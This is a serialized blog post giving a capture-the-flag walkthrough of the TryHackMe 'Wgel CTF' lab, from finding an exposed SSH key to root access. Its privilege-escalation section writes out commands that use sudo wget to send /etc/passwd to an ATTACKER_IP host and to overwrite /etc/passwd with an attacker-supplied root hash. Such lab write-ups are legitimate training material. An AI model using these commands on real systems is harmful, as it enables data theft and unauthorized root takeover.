[{"data":1,"prerenderedAt":484},["ShallowReactive",2],{"\u002F2025\u002Ftryhackme-wgelctf-writeup":3,"surround-\u002F2025\u002Ftryhackme-wgelctf-writeup":475},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"updated":10,"image":11,"categories":12,"recommend":14,"draft":6,"readingTime":15,"body":20,"_type":468,"_id":469,"_source":470,"_file":471,"_stem":472,"_extension":473,"_original_dir":474},"\u002F2025\u002Ftryhackme-wgelctf-writeup","2025",false,"","TryHackMe - Wgel CTF","A step-by-step walkthrough for the TryHackMe Wgel CTF room. This guide shows how to gain initial access via an exposed SSH key and escalate privileges to root by exploiting a wget sudo misconfiguration.","2025-08-27T11:42:45.000Z","https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-wgelctf-writeup\u002Fthumbnail.jpg",[13],"CTF",true,{"text":16,"minutes":17,"time":18,"words":19},"3 min read",2.115,126900,423,{"type":21,"children":22,"toc":461},"root",[23,29,45,52,56,60,77,81,86,90,103,107,127,131,144,148,152,158,170,174,179,185,205,209,235,239,252,398,402,406,418,452,457],{"type":24,"tag":25,"props":26,"children":28},"element","pic",{"src":27},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-wgelctf-writeup\u002F1.jpg",[],{"type":24,"tag":30,"props":31,"children":32},"p",{},[33,36],{"type":34,"value":35},"text","Target IP: ",{"type":24,"tag":37,"props":38,"children":42},"a",{"href":39,"rel":40},"https:\u002F\u002Ftryhackme.com\u002Froom\u002Fwgelctf",[41],"nofollow",[43],{"type":34,"value":44},"10.10.195.106",{"type":24,"tag":46,"props":47,"children":49},"h2",{"id":48},"reconnaissance",[50],{"type":34,"value":51},"Reconnaissance",{"type":24,"tag":25,"props":53,"children":55},{"src":54},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-wgelctf-writeup\u002F2.jpg",[],{"type":24,"tag":25,"props":57,"children":59},{"src":58},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-wgelctf-writeup\u002F3.jpg",[],{"type":24,"tag":30,"props":61,"children":62},{},[63,65,75],{"type":34,"value":64},"As you can see, we have an Apache page. When we examine the source code of this page, we find the username ",{"type":24,"tag":66,"props":67,"children":72},"code",{"className":68,"id":70,"style":71},[69],"example-info","just-like-this","color: #4DFFBE",[73],{"type":34,"value":74},"jessie",{"type":34,"value":76},".",{"type":24,"tag":25,"props":78,"children":80},{"src":79},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-wgelctf-writeup\u002F4.jpg",[],{"type":24,"tag":30,"props":82,"children":83},{},[84],{"type":34,"value":85},"To find out more, let's perform a directory search on the site.",{"type":24,"tag":25,"props":87,"children":89},{"src":88},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-wgelctf-writeup\u002F5.jpg",[],{"type":24,"tag":30,"props":91,"children":92},{},[93,95,101],{"type":34,"value":94},"Here we find a page in the ",{"type":24,"tag":66,"props":96,"children":98},{"className":97,"id":70,"style":71},[69],[99],{"type":34,"value":100},"\u002Fsitemap",{"type":34,"value":102}," directory.",{"type":24,"tag":25,"props":104,"children":106},{"src":105},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-wgelctf-writeup\u002F6.jpg",[],{"type":24,"tag":30,"props":108,"children":109},{},[110,112,117,119,125],{"type":34,"value":111},"We don't have anything at the moment. In that case, let's run another subdirectory scan for a ",{"type":24,"tag":66,"props":113,"children":115},{"className":114},[],[116],{"type":34,"value":100},{"type":34,"value":118}," directory using ",{"type":24,"tag":66,"props":120,"children":122},{"className":121},[],[123],{"type":34,"value":124},"gobuster",{"type":34,"value":126},"; perhaps we can find something here.",{"type":24,"tag":25,"props":128,"children":130},{"src":129},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-wgelctf-writeup\u002F7.jpg",[],{"type":24,"tag":30,"props":132,"children":133},{},[134,136,142],{"type":34,"value":135},"Here, the ",{"type":24,"tag":66,"props":137,"children":139},{"className":138,"id":70,"style":71},[69],[140],{"type":34,"value":141},"\u002Fsitemap\u002F.ssh\u002F",{"type":34,"value":143}," directory catches our attention.",{"type":24,"tag":25,"props":145,"children":147},{"src":146},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-wgelctf-writeup\u002F8.jpg",[],{"type":24,"tag":25,"props":149,"children":151},{"src":150},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-wgelctf-writeup\u002F9.jpg",[],{"type":24,"tag":46,"props":153,"children":155},{"id":154},"initial-access",[156],{"type":34,"value":157},"Initial Access",{"type":24,"tag":30,"props":159,"children":160},{},[161,163,168],{"type":34,"value":162},"Here we find an SSH key. Let's try to log in to the open SSH port with the username ",{"type":24,"tag":66,"props":164,"children":166},{"className":165},[],[167],{"type":34,"value":74},{"type":34,"value":169}," we found using this key.",{"type":24,"tag":25,"props":171,"children":173},{"src":172},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-wgelctf-writeup\u002F10.jpg",[],{"type":24,"tag":30,"props":175,"children":176},{},[177],{"type":34,"value":178},"And we logged in as Jessie. Now let's increase our authority.",{"type":24,"tag":46,"props":180,"children":182},{"id":181},"privilege-escalation",[183],{"type":34,"value":184},"Privilege Escalation",{"type":24,"tag":30,"props":186,"children":187},{},[188,190,195,197,203],{"type":34,"value":189},"We can see that with a simple command, the ",{"type":24,"tag":66,"props":191,"children":193},{"className":192},[],[194],{"type":34,"value":74},{"type":34,"value":196}," user can use the ",{"type":24,"tag":66,"props":198,"children":200},{"className":199,"id":70,"style":71},[69],[201],{"type":34,"value":202},"\u002Fusr\u002Fbin\u002Fwget",{"type":34,"value":204}," binary with sudo privileges without needing a password.",{"type":24,"tag":25,"props":206,"children":208},{"src":207},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-wgelctf-writeup\u002F11.jpg",[],{"type":24,"tag":30,"props":210,"children":211},{},[212,214,220,222,233],{"type":34,"value":213},"Now let's consider how we can elevate our privileges using the ",{"type":24,"tag":66,"props":215,"children":217},{"className":216},[],[218],{"type":34,"value":219},"wget",{"type":34,"value":221}," tool via ",{"type":24,"tag":37,"props":223,"children":226},{"href":224,"rel":225},"https:\u002F\u002Fgtfobins.github.io\u002Fgtfobins\u002Fwget\u002F",[41],[227],{"type":24,"tag":66,"props":228,"children":230},{"className":229},[],[231],{"type":34,"value":232},"GTFObins",{"type":34,"value":234},".\nHere, we first try to elevate our privileges using the method in the sudo section, but it doesn't work on our machine. We need to think of other things.",{"type":24,"tag":25,"props":236,"children":238},{"src":237},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-wgelctf-writeup\u002F12.jpg",[],{"type":24,"tag":30,"props":240,"children":241},{},[242,244,250],{"type":34,"value":243},"When we examine the GTFObins wget page, we see methods for uploading and downloading files, etc. With these, we can manipulate the ",{"type":24,"tag":66,"props":245,"children":247},{"className":246,"id":70,"style":71},[69],[248],{"type":34,"value":249},"\u002Fetc\u002Fpasswd",{"type":34,"value":251}," file. We will escalate our privileges step by step as follows:",{"type":24,"tag":253,"props":254,"children":255},"ol",{},[256,269,290,315,332,356,372],{"type":24,"tag":257,"props":258,"children":259},"li",{},[260,262,268],{"type":34,"value":261},"Let's open a port from our own device using ",{"type":24,"tag":66,"props":263,"children":265},{"className":264},[],[266],{"type":34,"value":267},"nc -nvlp \u003CPORT>",{"type":34,"value":76},{"type":24,"tag":257,"props":270,"children":271},{},[272,274,279,281,286],{"type":34,"value":273},"We need to copy the existing ",{"type":24,"tag":66,"props":275,"children":277},{"className":276},[],[278],{"type":34,"value":249},{"type":34,"value":280}," file to our own device. To do this, we will use the following wget command. This will send the file to the open port on our own device.",{"type":24,"tag":282,"props":283,"children":285},"copy",{"code":284},"URL=http:\u002F\u002FATTACKER_IP:PORT\nLFILE=\u002Fetc\u002Fpasswd\nsudo wget --post-file=$LFILE $URL",[],{"type":24,"tag":25,"props":287,"children":289},{"src":288},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-wgelctf-writeup\u002F13.jpg",[],{"type":24,"tag":257,"props":291,"children":292},{},[293,295,302,304,309,311],{"type":34,"value":294},"Let's record the incoming content in a file named ",{"type":24,"tag":66,"props":296,"children":299},{"className":297,"id":70,"style":298},[69],"color: #77BEF0",[300],{"type":34,"value":301},"passwd",{"type":34,"value":303},". Now let's edit the contents of this ",{"type":24,"tag":66,"props":305,"children":307},{"className":306},[],[308],{"type":34,"value":301},{"type":34,"value":310}," file and set our own desired password.",{"type":24,"tag":25,"props":312,"children":314},{"src":313},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-wgelctf-writeup\u002F14.jpg",[],{"type":24,"tag":257,"props":316,"children":317},{},[318,320,326,328],{"type":34,"value":319},"To do this, we will create a hashed password using the ",{"type":24,"tag":66,"props":321,"children":323},{"className":322,"id":70,"style":298},[69],[324],{"type":34,"value":325},"openssl passwd \u003Cyour password>",{"type":34,"value":327}," command.",{"type":24,"tag":25,"props":329,"children":331},{"src":330},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-wgelctf-writeup\u002F15.jpg",[],{"type":24,"tag":257,"props":333,"children":334},{},[335,337,342,344,350,352],{"type":34,"value":336},"We must place the hash of this password in the ",{"type":24,"tag":66,"props":338,"children":340},{"className":339,"id":70,"style":298},[69],[341],{"type":34,"value":21},{"type":34,"value":343}," section where ",{"type":24,"tag":66,"props":345,"children":347},{"className":346,"id":70,"style":298},[69],[348],{"type":34,"value":349},"x",{"type":34,"value":351}," is located. This way, we will have set a password for root.",{"type":24,"tag":25,"props":353,"children":355},{"src":354},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-wgelctf-writeup\u002F16.jpg",[],{"type":24,"tag":257,"props":357,"children":358},{},[359,361,366,368],{"type":34,"value":360},"Now, to download this ",{"type":24,"tag":66,"props":362,"children":364},{"className":363,"id":70,"style":298},[69],[365],{"type":34,"value":301},{"type":34,"value":367}," file that we have modified from our target device, let's open a Python HTTP server in the directory of this file.",{"type":24,"tag":25,"props":369,"children":371},{"src":370},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-wgelctf-writeup\u002F17.jpg",[],{"type":24,"tag":257,"props":373,"children":374},{},[375,377,382,384,390,392,397],{"type":34,"value":376},"Let's download the file from the target device using ",{"type":24,"tag":66,"props":378,"children":380},{"className":379,"id":70,"style":298},[69],[381],{"type":34,"value":219},{"type":34,"value":383}," with ",{"type":24,"tag":66,"props":385,"children":387},{"className":386,"id":70,"style":298},[69],[388],{"type":34,"value":389},"sudo",{"type":34,"value":391}," and set the output path to ",{"type":24,"tag":66,"props":393,"children":395},{"className":394,"id":70,"style":298},[69],[396],{"type":34,"value":249},{"type":34,"value":76},{"type":24,"tag":282,"props":399,"children":401},{"code":400},"sudo wget http:\u002F\u002F\u003CATTACKER_IP>:8000\u002Fpasswd -O \u002Fetc\u002Fpasswd",[],{"type":24,"tag":25,"props":403,"children":405},{"src":404},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-wgelctf-writeup\u002F18.jpg",[],{"type":24,"tag":30,"props":407,"children":408},{},[409,411,416],{"type":34,"value":410},"This allows us to modify the ",{"type":24,"tag":66,"props":412,"children":414},{"className":413,"id":70,"style":71},[69],[415],{"type":34,"value":249},{"type":34,"value":417}," file as desired. This enables us to log in using the password we have set.",{"type":24,"tag":419,"props":420,"children":422},"alert",{"type":421},"question",[423,432],{"type":24,"tag":424,"props":425,"children":426},"template",{"v-slot:title":7},[427],{"type":24,"tag":30,"props":428,"children":429},{},[430],{"type":34,"value":431},"Why X?",{"type":24,"tag":30,"props":433,"children":434},{},[435,437,443,445,450],{"type":34,"value":436},"The x expression in this line indicates that the password is normally stored in a more secure file named ",{"type":24,"tag":66,"props":438,"children":440},{"className":439},[],[441],{"type":34,"value":442},"\u002Fetc\u002Fshadow",{"type":34,"value":444},". We replace this x with our own password hash. This allows us to set our own password. Instead of looking at ",{"type":24,"tag":66,"props":446,"children":448},{"className":447},[],[449],{"type":34,"value":442},{"type":34,"value":451},", it will look directly at the hash we have specified.",{"type":24,"tag":30,"props":453,"children":454},{},[455],{"type":34,"value":456},"And we can easily gain root access with our own password.",{"type":24,"tag":25,"props":458,"children":460},{"src":459},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-wgelctf-writeup\u002F19.jpg",[],{"title":7,"searchDepth":462,"depth":462,"links":463},4,[464,466,467],{"id":48,"depth":465,"text":51},2,{"id":154,"depth":465,"text":157},{"id":181,"depth":465,"text":184},"markdown","content:posts:2025:tryhackme-wgelctf-writeup.md","content","posts\u002F2025\u002Ftryhackme-wgelctf-writeup.md","posts\u002F2025\u002Ftryhackme-wgelctf-writeup","md","\u002Fposts",[476,480],{"_path":477,"title":478,"date":479},"\u002F2025\u002Ftryhackme-bruteit-writeup","TryHackMe - Brute It","2025-08-26T13:49:07.000Z",{"_path":481,"title":482,"date":483},"\u002F2025\u002Ftryhackme-chillhack-writeup","TryHackMe - Chill Hack","2025-08-28T11:03:29.000Z",1776934250841]